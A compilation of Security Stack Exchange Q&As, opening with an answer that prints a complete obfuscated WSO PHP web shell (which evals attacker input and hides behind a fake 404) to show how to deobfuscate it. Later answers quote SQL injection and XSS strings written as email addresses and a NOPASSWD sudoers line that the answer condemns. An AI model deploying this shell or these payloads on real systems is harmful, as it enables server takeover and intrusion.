Take a look at the code: <?php ${"\x47LOB\x41\x4c\x53"}["\x76\x72vw\x65y\x70\x7an\x69\x70\x75"]="a";${"\x47\x4cOBAL\x53"}["\x67\x72\x69u\x65\x66\x62\x64\x71c"]="\x61\x75\x74h\x5fpas\x73";${"\x47\x4cOBAL\x53"}["\x63\x74xv\x74\x6f\x6f\x6bn\x6dju"]="\x76";${"\x47\x4cO\x42A\x4cS"}["p\x69\x6fykc\x65\x61"]="def\x61ul\x74\x5fu\x73\x65_\x61j\x61\x78";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["i\x77i\x72\x6d\x78l\x71tv\x79p"]="defa\x75\x6c\x74\x5f\x61\x63t\x69\x6f\x6e";${"\x47L\x4fB\x41\x4cS"}["\x64\x77e\x6d\x62\x6a\x63"]="\x63\x6fl\x6f\x72";${${"\x47\x4c\x4f\x42\x41LS"}["\x64\x77\x65\x6dbj\x63"]}="\x23d\x665";${${"\x47L\x4fB\x41\x4c\x53"}["\x69\x77\x69rm\x78\x6c\x71\x74\x76\x79p"]}="\x46i\x6cesM\x61n";$oboikuury="\x64e\x66a\x75\x6ct\x5fc\x68\x61\x72\x73\x65t";${${"\x47L\x4f\x42\x41\x4cS"}["p\x69oy\x6bc\x65\x61"]}=true;${$oboikuury}="\x57indow\x73-1\x325\x31";@ini_set("\x65r\x72o\x72_\x6cog",NULL);@ini_set("l\x6fg_er\x72ors",0);@ini_set("max_ex\x65\x63\x75\x74\x69o\x6e\x5f\x74im\x65",0);@set_time_limit(0);@set_magic_quotes_runtime(0);@define("WS\x4f\x5fVE\x52S\x49ON","\x32.5\x2e1");if(get_magic_quotes_gpc()){function WSOstripslashes($array){${"\x47\x4c\x4f\x42A\x4c\x53"}["\x7a\x64\x69z\x62\x73\x75e\x66a"]="\x61\x72r\x61\x79";$cfnrvu="\x61r\x72a\x79";${"GLOB\x41L\x53"}["\x6b\x63\x6ct\x6c\x70\x64\x73"]="a\x72\x72\x61\x79";return is_array(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x7ad\x69\x7ab\x73\x75e\x66\x61"]})?array_map("\x57SOst\x72\x69\x70\x73\x6c\x61\x73\x68\x65s",${${"\x47\x4cO\x42\x41LS"}["\x6b\x63\x6c\x74l\x70\x64\x73"]}):stripslashes(${$cfnrvu});}$_POST=WSOstripslashes($_POST);$_COOKIE=WSOstripslashes($_COOKIE);}function wsoLogin(){header("\x48\x54TP/1.\x30\x204\x30\x34\x20\x4eo\x74 \x46ound");die("4\x304");}function WSOsetcookie($k,$v){${"\x47\x4cO\x42ALS"}["\x67vf\x6c\x78m\x74"]="\x6b";$cjtmrt="\x76";$_COOKIE[${${"G\x4c\x4f\x42\x41LS"}["\x67\x76\x66\x6cxm\x74"]}]=${${"GLO\x42\x41\x4cS"}["\x63\x74\x78\x76t\x6f\x6fknm\x6a\x75"]};$raogrsixpi="\x6b";setcookie(${$raogrsixpi},${$cjtmrt});}$qyvsdolpq="a\x75\x74\x68\x5f\x70\x61s\x73";if(!empty(${$qyvsdolpq})){$rhavvlolc="au\x74h_\x70a\x73\x73";$ssfmrro="a\x75t\x68\x5fpa\x73\x73";if(isset($_POST["p\x61ss"])&&(md5($_POST["pa\x73\x73"])==${$ssfmrro}))WSOsetcookie(md5($_SERVER["H\x54\x54P_\x48\x4f\x53T"]),${${"\x47L\x4f\x42\x41\x4c\x53"}["\x67\x72\x69\x75e\x66b\x64\x71\x63"]});if(!isset($_COOKIE[md5($_SERVER["\x48T\x54\x50\x5f\x48O\x53\x54"])])||($_COOKIE[md5($_SERVER["H\x54\x54\x50_H\x4fST"])]!=${$rhavvlolc}))wsoLogin();}function actionRC(){if(!@$_POST["p\x31"]){$ugtfpiyrum="a";${${"\x47\x4c\x4fB\x41LS"}["\x76r\x76w\x65\x79\x70z\x6eipu"]}=array("\x75n\x61m\x65"=>php_uname(),"p\x68\x70\x5fver\x73\x69o\x6e"=>phpversion(),"\x77s\x6f_v\x65\x72si\x6f\x6e"=>WSO_VERSION,"saf\x65m\x6f\x64e"=>@ini_get("\x73\x61\x66\x65\x5fm\x6fd\x65"));echo serialize(${$ugtfpiyrum});}else{eval($_POST["\x70\x31"]);}}if(empty($_POST["\x61"])){${"\x47L\x4fB\x41LS"}["\x69s\x76\x65\x78\x79"]="\x64\x65\x66\x61\x75\x6ct\x5f\x61c\x74i\x6f\x6e";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x75\x6f\x65c\x68\x79\x6d\x7ad\x64\x64"]="\x64\x65\x66a\x75\x6c\x74_\x61\x63\x74\x69\x6fn";if(isset(${${"\x47L\x4f\x42\x41LS"}["\x69\x77ir\x6d\x78lqtv\x79\x70"]})&&function_exists("\x61ct\x69\x6f\x6e".${${"\x47L\x4f\x42\x41\x4cS"}["\x75o\x65ch\x79\x6d\x7a\x64\x64\x64"]}))$_POST["a"]=${${"\x47\x4c\x4f\x42ALS"}["i\x73\x76e\x78\x79"]};else$_POST["a"]="\x53e\x63\x49\x6e\x66o";}if(!empty($_POST["\x61"])&&function_exists("actio\x6e".$_POST["\x61"]))call_user_func("\x61\x63\x74\x69\x6f\x6e".$_POST["a"]);exit; ?> Let's copy and 
paste this into UnPHP . Once the results are in, we can finally see what it's doing, but it looks all smashed together. Let's paste it into the PHP Beautifier . Now it's a lot easier to read ! Deobfuscating variable names If you're not able to deobfuscate variable names through any of the previously-mentioned methods, then deobfuscating those variable names can be a manual, time-consuming process. Fortunately, looking for common malware patterns such as shutting off the log files, using eval() or preg_replace() with obfuscation indicates that something is wrong. Obfuscation is the wrong approach , so if you find code obfuscated on your website, you should assume you've been hacked. You should not be obfuscating your code. Security at the expense of usability is not security. Deobfuscation Risks Trying to decode these files on your own web server is not safe for a lot of reasons, some of which may be unknown to us. Do not try to deobfuscate PHP files on your own web server. You could inadvertently introduce additional backdoors, or assist the malware in spreading itself because many of the scripts load functions remotely. That's nice, but how did I get hacked? This is really too broad to answer without us having access to everything on your web server, including logs. You may have incorrect hardening on your Content Management System (CMS) installation, or there may be a vulnerability somewhere in your web stack. You can check these links if they're part of your CMS: Joomla Security Checklist WordPress Hardening Drupal Security Checklist If your CMS isn't listed, look for hardening/security checklists for your CMS installation. If you are not using a CMS, but rather your own code, then it's on you to fix your security holes. The OWASP Cheat Sheet serves as a good starting point to finding and fixing common vulnerabilities. Remember, only you can prevent shell access. There could be any number of reasons why this is happening... but the bottom line is: either your web host has been hacked, or you have an exploit on your website which allows malicious individuals to insert additional code and give them full control over your website... meanwhile, they are attacking your visitors . So what do I do?! You should read this Q&A: How do I deal with a compromised server?
{ "source": [ "https://security.stackexchange.com/questions/115461", "https://security.stackexchange.com", "https://security.stackexchange.com/users/87119/" ] }
115,507
When I look at the exploits from the past few years related to implementations, I see that quite a lot of them are from C or C++, and a lot of them are overflow attacks. Heartbleed was a buffer overflow in OpenSSL; Recently, a bug in glibc was found that allowed buffer overflows during DNS resolving; that's just the ones I can think off right now, but I doubt that these were the only ones that A) are for software written in C or C++ and B) are based on a buffer overflow. Especially concerning the glibc bug, I read a comment that states that if this happened in JavaScript instead of in C, there wouldn't have been an issue. Even if the code was just compiled to Javascript, it wouldn't have been an issue. Why are C and C++ so vulnerable to overflow attacks?
C and C++, contrary to most other languages, traditionally do not check for overflows. If the source code says to put 120 bytes in an 85-byte buffer, the CPU will happily do so. This is related to the fact that while C and C++ have a notion of array, this notion is compile-time only. At execution time, there are only pointers, so there is no runtime method to check an array access with regard to the conceptual length of that array.

By contrast, most other languages have a notion of array that survives at runtime, so that all array accesses can be systematically checked by the runtime system. This does not eliminate overflows: if the source code asks for something nonsensical such as writing 120 bytes in an array of length 85, it still makes no sense. However, this automatically triggers an internal error condition (often an "exception", e.g. an ArrayIndexOutOfBoundsException in Java) that interrupts normal execution and does not let the code proceed. This disrupts execution, and often implies a cessation of the complete processing (the thread dies), but it normally prevents exploitation beyond a simple denial-of-service.

Basically, buffer overflow exploits require the code to make the overflow (reading or writing past the boundaries of the accessed buffer) and to keep on doing things beyond that overflow. Most modern languages, contrary to C and C++ (and a few others such as Forth or Assembly), don't allow the overflow to really occur and instead shoot the offender. From a security point of view this is much better.
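To illustrate the runtime-check difference described above, here is a tiny sketch in a bounds-checked language (Python is used here merely as an example of the behaviour most modern languages share); the contrasting C behaviour is only described in the comments, not executed:

# In a bounds-checked language, an out-of-range access raises an error instead
# of silently touching neighbouring memory.
buffer = bytearray(85)          # conceptually an 85-byte buffer

try:
    for i in range(120):        # try to write 120 bytes into it
        buffer[i] = 0x41
except IndexError as exc:
    # Execution is interrupted at index 85; nothing past the buffer is written.
    print("stopped at the boundary:", exc)

# The equivalent C code -- char buf[85]; for (int i = 0; i < 120; i++) buf[i] = 'A'; --
# would compile, run, and quietly overwrite whatever sits after buf in memory.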
{ "source": [ "https://security.stackexchange.com/questions/115507", "https://security.stackexchange.com", "https://security.stackexchange.com/users/34161/" ] }
115,578
Can I simply build a webserver, make its hostname " google.com ", create a CSR off that server, and send that to a Certificate Authority for signing? Let's say I pick the cheapest and dodgiest outfit I can find. Will that work? What mechanisms are in place to stop people from doing this? I am well aware that I won't receive any traffic destined to google.com due to the DNS records pointing to the real Google, but I could MitM attack any Google traffic using this method. I could also redirect local traffic to my own server without the users knowing any better.
This is more of a problem than you think, particularly for a company like Google, because they're a frequent target for this type of shenanigans. But there are several layers of safeguards, and our protection is getting better over time.

Your first line of defense is the Certificate Authority

They shouldn't let certificates be signed inappropriately. Each CA has its own mechanism for verifying your entitlement to purchase a cert for a given domain, but typically it includes having you do one or more of the following:

- Verify ownership of the email address listed in the WHOIS info for the domain.
- Verify ownership of an email address that follows one of several predetermined patterns on the domain (e.g. "administrator@{domain}")
- Create a specific DNS record on the domain
- Make a specific change to the website hosted at that domain

But with as many CAs as we have, a surprising number of inappropriate certs get issued. This is a case of, "you had literally ONE job," but we have to accept that mistakes will happen.

Certificate Transparency was created to help audit the CAs

There's a surprising lack of accountability and transparency on the part of CAs, so Google decided to do something about it with Certificate Transparency. This is a public log of every certificate that the CA signs; if a cert doesn't show up in the log then it's not valid, and the log is append-only; you can't go back and scrub your history. It's still relatively new, but Chrome already requires it on certain CAs, including all EV CAs. The idea is that you can follow the log and see if your domain shows up when it shouldn't. Tools are still evolving to make this simpler, but it's a very promising technology.

Your final line of defense is key pinning

The more secure browsers will allow domain owners to "pin" one or more public keys to their domain. This is an end-around the whole PKI system and injects the trust directly into the browser. Domain owners can, via HTTP header, tell the browser to only allow certs with specific public keys, and can in fact ship that assertion pre-installed on the browser itself. This prevents an unauthorized certificate from being used, even if it has a valid CA signature.

DNSSEC and DANE is where this is eventually going to go

Probably. With DNSSEC, you can sign your DNS records, which means that you can put your public key signature right there in DNS. Which means you don't need a third-party certificate authority to sign your keys. That's a pretty elegant solution, but DNSSEC is a way off still; you can't use it with a number of OSes, and adoption is positively glacial.
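On the "follow the log" point: one practical way to keep an eye on Certificate Transparency data for your own domain is to query one of the public log aggregators. The sketch below uses crt.sh's JSON interface; the endpoint and field names are assumptions that may change over time, so treat it as a starting point rather than a finished monitor:

# Rough sketch: list certificates that CT log aggregators have seen for a domain.
# Uses the crt.sh JSON endpoint; field names and availability are assumptions.
import json
import urllib.parse
import urllib.request

def ct_entries(domain: str):
    url = "https://crt.sh/?q=" + urllib.parse.quote(domain) + "&output=json"
    with urllib.request.urlopen(url, timeout=30) as resp:
        return json.loads(resp.read().decode("utf-8"))

if __name__ == "__main__":
    for entry in ct_entries("example.com"):
        # Print issuer and the names on the cert; anything unexpected is worth a look.
        print(entry.get("issuer_name"), "->", entry.get("name_value"))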
{ "source": [ "https://security.stackexchange.com/questions/115578", "https://security.stackexchange.com", "https://security.stackexchange.com/users/102322/" ] }
115,648
A system we're introducing into the organization is not using any traditional hashing function that I can find. I've been assigned to "approve" it by black-box testing. I suspect passwords are simply being obfuscated or encrypted (not hashed) since the length of the result changes with password length (though there is some minimum, it seems - perhaps padding?). Here is some data: password : result 1 : TG3432WB7VU= 11 : r8ahLkJGWbY= 111 : E7fXdNqEWAA= 11111111 : FIcx3a00R4e GhFyHjD56qw== 1111111111 : FIcx3a00R4e vxqEuQkZZtg== 2111111111 : GPwnH80qEAC vxqEuQkZZtg== The result is obviously base64, but doesn't decode to anything readable. Before I knew that the result's length changed, I tried taking the decoded bytes and treating them as MD5 and other hashing functions, but that obviously didn't pan out. Now that I know the result changes in length, I'm considering other, worse, alternatives. Of note are the two bold parts above: they're identical in two different passwords. So either each 8 bytes are being processed independently (why?) or there's some polyalphabetic substitution going on(?). Update: Any character, including Unicode characters, is accepted by the system for passwords. Repeating a 3-byte character 8 times does result in a 24 byte long "hash".
I highly suspect this is a self rolled, or at least very outdated method. It is very weak by modern standards and should not be used to protect anything important. Short passwords could be cracked with no more than 2^64 brute force attempts, which is quite possible with even a normal computer. If both halves of the result are independent, even with fairly long passwords, 2*2^64 brute force attempts could crack it (so 2^65 attempts). There are likely further weaknesses in the algorithm that make it weaker than described here. Another interesting point to test would be 2111111111 and see if the second part of the result remains the same. If the second part doesn't change, this is definitely a weak algorithm. Edit: Seeing that the results of the 2111111111 test are the same for the second half, this is definitely a weak algorithm and should not be used to protect anything sensitive! I have included the relevant comparison below: 1111111111 : FIcx3a00R4e vxqEuQkZZtg == 2111111111 : GPwnH80qEAC vxqEuQkZZtg == Edit: Another interesting test would be what Ricky Demer suggests below: The next thing to check is that it handles the 8-byte blocks identically. ​ What are the "hashes" of aaaaaaaabbbbbbbbc and bbbbbbbbaaaaaaaac? ​ ​ ​ ​ – Ricky Demer Feb 25 at 6:44 If it handled the 8-byte blocks identically, it is even worse for even long passwords, no matter what the length. It would require just 2^64 brute force attempts as pointed out by Neil in the comments. Once someone made a table of what each possibility calculates to, this algorithm would be practically useless. There are probably even more weaknesses to this algorithm remaining to be discovered. Bottom line: I do not recommend using this algorithm regardless of the results of the last test. We have already seen enough to know it is weak. Something with a higher bit encryption / hash scheme, salt, long computation time etc... would be much better, and I would recommend going with one of the existing thoroughly tested methods. Self rolled encryption / hashing has not had the benefit of extensive testing that most of the main stream methods have.
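To see why block independence is so damaging, here is a toy model in Python. The per-block transform below is a stand-in invented purely for illustration (it is not the vendor's real algorithm): it processes each 8-byte block of the password separately, which reproduces the observed behaviour that passwords sharing a block share part of the output, and shows why a single precomputed table would break every password.

# Toy model of a block-independent password "hash" (NOT the real algorithm).
# Each 8-byte block is transformed on its own, so equal blocks give equal output.
import base64
import hashlib

def encode_block(block: bytes) -> bytes:
    # Stand-in per-block transform; the real system presumably uses something else.
    return hashlib.sha256(block).digest()[:8]

def weak_encode(password: str) -> str:
    data = password.encode()
    blocks = [data[i:i + 8].ljust(8, b"\x00") for i in range(0, max(len(data), 1), 8)]
    return base64.b64encode(b"".join(encode_block(b) for b in blocks)).decode()

print(weak_encode("1111111111"))
print(weak_encode("2111111111"))  # second half identical: the second block is the same

# Consequence: an attacker can brute-force each 8-byte block separately (at most
# 2^64 tries per block), or build one lookup table of block -> output and reuse it
# against every password, no matter how long the passwords are.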
{ "source": [ "https://security.stackexchange.com/questions/115648", "https://security.stackexchange.com", "https://security.stackexchange.com/users/102433/" ] }
115,671
I'm trying to secure a REST API, our situation is that every client connecting to this API will also have a certificate signed by our own CA. Because of this, I think we can use the client certificate as an authentication mechanism, and install our root certificate on the webserver for verification and then use mutual authentication through HTTPS. We intend to do this with nginx so it's as simple as requiring nginx to have client verification on. However, I'm unclear about whether I should still timestamp and sign each request, should I still worry about message integrity and replay attack? Is there anything other attacks I should guard against?
{ "source": [ "https://security.stackexchange.com/questions/115671", "https://security.stackexchange.com", "https://security.stackexchange.com/users/53572/" ] }
115,794
I've seen several blanket statements on the web to the effect that you don't need CSRF protection for GET requests. But many web applications have GET requests that return sensitive data, right? Then wouldn't you want to protect those against CSRF attacks? Am I missing something, or are these blanket statements assuming that the data the GET request gives is unimportant? Examples of blanket recommendations gainst using CSRF tokens with GET: https://security.stackexchange.com/a/90027/5997 Therefore, if a website has kept to the standard and only implements "unsafe" actions as POSTs, then here only POST requests are vulnerable. http://www.django-rest-framework.org/topics/ajax-csrf-cors/ Ensure that the 'safe' HTTP operations, such as GET, HEAD and OPTIONS cannot be used to alter any server-side state. The assumption here is that if GET doesn't modify state, it's not worth protecting. http://sakurity.com/blog/2015/03/04/hybrid_api_auth.html contains a code line that suggests this approach: # 1) verify CSRF token for all non-GET requests
CSRF protection is only needed for state-changing operations because of the same-origin policy . This policy states that: a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin. So the CSRF attack will not be able to access the data it requests because it is a cross-site (that's the CS in CSRF ) request and prohibited by the same-origin policy. So illicit data access is not a problem with CSRF. As a CSRF attack can execute commands but can't see their results, it is forced to act blindly. For example, a CSRF attack can tell your browser to request your bank account balance, but it can't see that balance. This is obviously a pointless attack (unless you're trying to DDoS the bank server or something). But it is not pointless if, for example, the CSRF attack tells your browser to instruct your bank to transfer money from your account to the attacker's account. The success or failure page for the transfer is inaccessible to the attacking script. Fortunately for the attacker, they don't need to see the bank's response, they just want the money in their account. As only state-changing operations are likely to be targets of CSRF attacks, only they need CSRF defenses.
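If you want to see what "protect only the state-changing verbs" looks like in practice, here is a small hedged sketch of server-side middleware. It assumes a Flask-style application and a per-session token; real frameworks usually ship an equivalent mechanism, so prefer the built-in one where available.

# Sketch: require a CSRF token only for state-changing methods.
# Assumes Flask; thresholds, routes and token handling are illustrative only.
import secrets
from flask import Flask, request, session, abort

app = Flask(__name__)
app.secret_key = secrets.token_bytes(32)

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}

@app.route("/login")
def login():
    # Token issuance sketch: in a real app this happens when the session is created.
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

@app.before_request
def check_csrf():
    if request.method in SAFE_METHODS:
        return                      # safe verbs must not change state anyway
    sent = request.headers.get("X-CSRF-Token") or request.form.get("csrf_token")
    expected = session.get("csrf_token")
    if not expected or not sent or not secrets.compare_digest(sent, expected):
        abort(403)

@app.route("/transfer", methods=["POST"])
def transfer():
    return "money moved"            # only reachable with a valid token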
{ "source": [ "https://security.stackexchange.com/questions/115794", "https://security.stackexchange.com", "https://security.stackexchange.com/users/5997/" ] }
116,079
I have noticed several questions on Stack Overflow, like this one, about executing commands with root privileges using PHP. The answer proposed to add the line www-data ALL=(ALL) NOPASSWD: ALL to the /etc/sudoers.d file. Is it a safe approach to solve the problem? Does it create a vulnerability?
This... is atrocious. The whole point of running Web things as a non-root user is damage containment: in case the Web server process gets hijacked through some vulnerability, at least the attacker won't obtain full control of the machine, since he will be constrained by the limitations of the non-root account www-data . But if you give www-data a way to run every command it wishes to, with the rights of any user (including root ), and without any further authentication, then you just lost that damage containment feature. To be fair, www-data + sudo is slightly better than simply running everything as root , because the going-to-root has to be explicit; therefore, common flaws like a PHP script writing files in improper locations would be harder to exploit. But still, making www-data a member of the sudoers looks like a poor idea.
{ "source": [ "https://security.stackexchange.com/questions/116079", "https://security.stackexchange.com", "https://security.stackexchange.com/users/100038/" ] }
116,113
I need to limit login attempts. One option is to count attempts by IP address and then block the IP. The disadvantage is that different users may have the same IP address. Another option is to limit by an account identifier (username or email) and then block the account (it can be activated manually by support). The only disadvantage I can think of is that malicious users can guess usernames and block them... But other than that, it feels more secure because malicious users can use different IPs, right? What's the recommended way to do it?
I would say that you should do both. If you only rate limit on IP address, an attacker controlling a bot net could brute force an account with a weak password. If you have 10 000 computers with unique IPs and each one is allowed four attempts per hour you can try almost a million passwords per day. If you only rate limit on username, an attacker with a list of existing usernames could brute force accounts with a weak password. Chances are that a few of your users use one of the top 10 passwords, so if you try those on all accounts you will get in somewhere. Of course you could do all sorts of combinations. For instance you might only block a username once X different IPs have failed to log in with it, so that an attacker trying to block a user from logging in needs to work a bit for it.
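A minimal sketch of the combined approach might look like the following. The thresholds and the in-memory counters are placeholders (a real deployment would persist counts and handle multiple servers), but it shows both limits working together:

# Sketch: rate limit failed logins by IP and by username at the same time.
# Thresholds and in-memory storage are placeholders for illustration.
import time
from collections import defaultdict, deque

WINDOW = 3600          # seconds
MAX_PER_IP = 4         # failed attempts per IP per window
MAX_PER_USER = 20      # failed attempts per username per window (across all IPs)

failed_by_ip = defaultdict(deque)
failed_by_user = defaultdict(deque)

def _prune(q):
    now = time.time()
    while q and now - q[0] > WINDOW:
        q.popleft()

def allowed(ip: str, username: str) -> bool:
    _prune(failed_by_ip[ip])
    _prune(failed_by_user[username])
    return (len(failed_by_ip[ip]) < MAX_PER_IP
            and len(failed_by_user[username]) < MAX_PER_USER)

def record_failure(ip: str, username: str) -> None:
    now = time.time()
    failed_by_ip[ip].append(now)
    failed_by_user[username].append(now)

# Usage: call allowed() before checking credentials, record_failure() on a miss.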
{ "source": [ "https://security.stackexchange.com/questions/116113", "https://security.stackexchange.com", "https://security.stackexchange.com/users/22588/" ] }
116,116
I have been using this RFC822-compliant regular expression for email validation. Pen testers on HackerOne have used the following horrendous email addresses which satisfy the regex: '/**/OR/**/1=1/**/--/**/@a.a [email protected]&a=////etc/passwd [email protected]&&a=a %00%[email protected] Are those email addresses valid? How can I do safe email validation?
Are those email addresses valid?

Yes, they are. See for example here or with a bit more explanation here. For a nice explanation of how emails may look, see the informational RFC3696. The more technical RFCs are linked there as well.

Attacks possible in the local part of an email address

Without quotes, local-parts may consist of any combination of alphabetic characters, digits, or any of the special characters

! # $ % & ' * + - / = ? ^ _ ` . { | } ~

A period (".") may also appear, but may not be used to start or end the local part, nor may two or more consecutive periods appear. Stated differently, any ASCII graphic (printing) character other than the at-sign ("@"), backslash, double quote, comma, or square brackets may appear without quoting. If any of that list of excluded characters are to appear, they must be quoted.

So the rule is more or less: most characters can be part of the local part, except for @\",[] - those must be in between " quotes (except of course " itself, which has to be escaped when in a quoted string). There are also rules on where and when to quote and how to handle comments, but that's less relevant to your question. The point here is that many attacks can be part of the local part of an email address, for example:

'/**/OR/**/1=1/**/--/**/@a.a
"<script>alert(1)</script>"@example.com
" onmouseover=alert(1) foo="@example.com
"../../../../../test%00"@example.com
...

Attacks possible in the domain part of an email address

The exact structure of the domain part can be seen in RFC2822 or RFC5322:

addr-spec       = local-part "@" domain
local-part      = dot-atom / quoted-string / obs-local-part
domain          = dot-atom / domain-literal / obs-domain
domain-literal  = [CFWS] "[" *([FWS] dcontent) [FWS] "]" [CFWS]
dcontent        = dtext / quoted-pair
dtext           = NO-WS-CTL /     ; Non white space controls
                  %d33-90 /       ; The rest of the US-ASCII
                  %d94-126        ; characters not including "[", "]", or "\"

Where:

dtext           = %d33-90 /       ; Printable US-ASCII
                  %d94-126 /      ; characters not including
                  obs-dtext       ; "[", "]", or "\"

You can see that again, most characters are allowed (even non-ASCII characters). Possible attacks would be:

[email protected]&a=////etc/passwd
foo@bar(<script>alert(1)</script>).com
foo@'/**/OR/**/1=1/**/--/**/

Conclusion

You can't validate email addresses safely. Instead, you need to make sure to have proper defenses in place (HTML encoding for XSS, prepared statements for SQL injection, etc). As defense in depth, you could forbid quoted strings and comments to gain some amount of protection, as these two things allow the most unusual characters and strings. But some attacks are still possible, and you will exclude a small number of users.

If you do need additional input filtering that exceeds the limits of the email format, because you do not trust the rest of your application, you should carefully consider what you do allow and what you do not allow. For example, + is used by Gmail to allow filtering of incoming emails, so not allowing it may lead users to not sign up. Other characters may be used by other providers for similar functionality. A first approach might be to only allow alphanumerics plus ! # % * + - = ? ^ _ . | ~ . This would disallow < > ' " ` / $ { } & , which are characters used in common attacks. Depending on your application, you may want to disallow further characters.
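For completeness, here is a small sketch of what that last "allowlist" approach could look like on the server side. The character set simply mirrors the first-approach list above and is deliberately conservative; it is an illustration, not a claim that this is the one correct email filter:

# Sketch of the conservative allowlist approach described above (server-side).
# It intentionally rejects quoted strings, comments and most attack characters,
# at the cost of refusing a small number of technically valid addresses.
import re

ALLOWED_EMAIL = re.compile(
    r"^[A-Za-z0-9!#%*+\-=?^_.|~]+"     # local part: alphanum plus the allowlist above
    r"@"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"          # domain label
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)+$"  # further labels / TLD
)

def acceptable_email(address: str) -> bool:
    return len(address) <= 254 and ALLOWED_EMAIL.fullmatch(address) is not None

print(acceptable_email("first.last+tag@example.com"))               # True
print(acceptable_email("'/**/OR/**/1=1/**/--/**/@a.a"))             # False
print(acceptable_email('"<script>alert(1)</script>"@example.com'))  # False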
And as you mentioned RFC822 : It is a bit outdated (it's from 1982), but even it allows for quoted strings and comments, so just saying that you only accept RFC822 compliant addresses would not only not be practical, but also not work. Also, are you checking your emails client-side? The JS code gives that impression. An attacker could just bypass client-side checks.
{ "source": [ "https://security.stackexchange.com/questions/116116", "https://security.stackexchange.com", "https://security.stackexchange.com/users/11902/" ] }
116,139
There is a new recent attack "on TLS" named "DROWN" . I understand that it appears to use bad SSLv2 requests to recover static (certificate) keys. My question is: How? How can you recover static encryption or signature keys using SSLv2? Bonus questions: How can I prevent the attack from applying to me as a server admin? How could the attack spawn in the first place?
To understand the attack, one must recall Bleichenbacher's attack from the late 20th century. In that attack, the attacker uses the target server as an oracle. When using RSA-based key exchange, the client is supposed to send a secret value (the "pre-master secret") encrypted with the server's public key, using PKCS#1 v1.5 padding (called "type 2"). Bleichenbacher's attack relied on sending carefully crafted values in lieu of a properly encrypted message, and observing the server's reaction. The server might respond (most of the time) with an error saying "I processed that but it did not yield a proper PKCS#1 v1.5 type 2 padding"; but sometimes, the decryption seems to work and the server proceeds with whatever it obtained. The attacker sees that difference in behaviour, and thus gains a tiny bit of information about the private key. After a million connections or so, the attacker knows enough to perform an arbitrary decryption and thus break a previously recorded session.

This attack is of the same kind, but with a new technique that relies on the specificities of SSL 2.0. SSL 2.0 is an old protocol version that has several serious flaws and should not be used. It has been deprecated for more than 15 years. It was even formally prohibited in 2011. Nevertheless, some people still support SSL 2.0. Even worse, they support it with so-called "export" cipher suites where encryption strength is down to about 40 bits.

So the attack works a bit like this:

1. The attacker observes an encrypted SSL/TLS session (a modern, robust one, say TLS 1.2) that uses RSA key exchange, and he would like to decrypt it. Not all SSL/TLS sessions are amenable to the attack as described; there is a probability of about 1/1000 that the attack works. So the attacker will need to gather about a thousand encrypted sessions, and will ultimately break through one of them. The authors argue that in a setup which looks like the ones for CRIME and BEAST (hostile Javascript that triggers invisible connections in the background), this collection can be automated.
2. The server carelessly uses the same RSA private key for an SSL 2.0 system (maybe the same server, maybe another software system that may implement another protocol, e.g. a mail server). The attacker has the possibility to try to talk to that other system.
3. The attacker begins an SSL 2.0 handshake with that system, using as ClientMasterKey message a value derived from the one that the attacker wants to decrypt. He also asks to use a 40-bit export cipher suite.
4. The attacker observes the server's response, and brute-forces the 40-bit value that the server came up with when it decrypted the value sent by the attacker. At that point, the attacker knows part of the result of the processing of his crafted value by the server with its private key. This indirectly yields a bit of information on the encrypted message that the attacker is really interested in.
5. The attacker needs to do steps 3 and 4 about a few thousand times, in order to recover the encrypted pre-master secret from the target session.

For the mathematical details, read the article.

Conditions for application:

- The connection must use RSA key exchange. The attack, as described, cannot do much against a connection that uses DHE or ECDHE key exchange (which are recommended anyway for forward secrecy).
- The same private key must be used in a system that implements SSL 2.0, accessible to the attacker, and that furthermore accepts to negotiate an "export" cipher suite.
(Note: If OpenSSL is used and not patched for CVE-2015-3197, even if "export" cipher suites are disabled, a malicious client can still negotiate and complete a handshake with those disabled cipher suites.)

- The attacker must be able to make a few thousand or so connections to that SSL 2.0 system, and then run a 40-bit brute force for each; the total computing cost is about 2^50 operations.

It must be well understood that the 2^50 effort is for each connection that the attacker tries to decrypt. If he wants to, say, read credit card numbers from connections he observes, he will need to put in a non-negligible amount of work for each credit card number. While the attack is very serious, it is not really practical in that CCN-grabbing setup.

The solution: don't use SSL 2.0. Dammit. You should have stopped using SSL 2.0 in the previous millennium. When we said "don't use it, it is weak", we really meant it. It is high time to wake up and do your job. Supporting weak ("export") cipher suites was not a smart move either. Guess what? Weak crypto is weak. Deactivating SSL 2.0 is the only right way to fix the issue. While you are at it, deactivate SSL 3.0 as well. (And that fashion of using all-uppercase acronyms for attacks is really ridiculous.)
{ "source": [ "https://security.stackexchange.com/questions/116139", "https://security.stackexchange.com", "https://security.stackexchange.com/users/71460/" ] }
116,144
I want to authenticate a client of a webpage and make sure it is a particular user. Let say that we already agreed on a particular hash ( SHA256 , actually, which I think is secure enough for this) and we both already exchanged a key in a file through a trusted medium. This key is pretty much a text file with 2K of random letters. I have it stored in my server, they have it stored somewhere in their computer. These are the steps devised to authenticate the client: The server generates a challenge , a random string of 128 letters. The server sends the challenge to the client's browser. The client has access to an input field where they load their key file. The client computes an answer by appending key to their challenge contents and computing its hash. The client sends back only the answer for this particular challenge . The server compares the received answer with one generated locally and if they match then I can assume that the client is the person who I think it is. Final assumption, the exchange of both the challenge and the answer through the web may happen through an insecure channel. Actually, assume that it WILL happen through an insecure channel, i.e. HTTP. Is this scheme secure? If not, what are its pitfalls? In step 4, does it make a difference if I compute the hash as challenge + key instead of key + challenge . I guess this has to do with the hash algorithm I chose, and I think SHA256 handles those things well, but I'm no expert. Does it matters much if I increase/decrease the length of the key and challenge ?
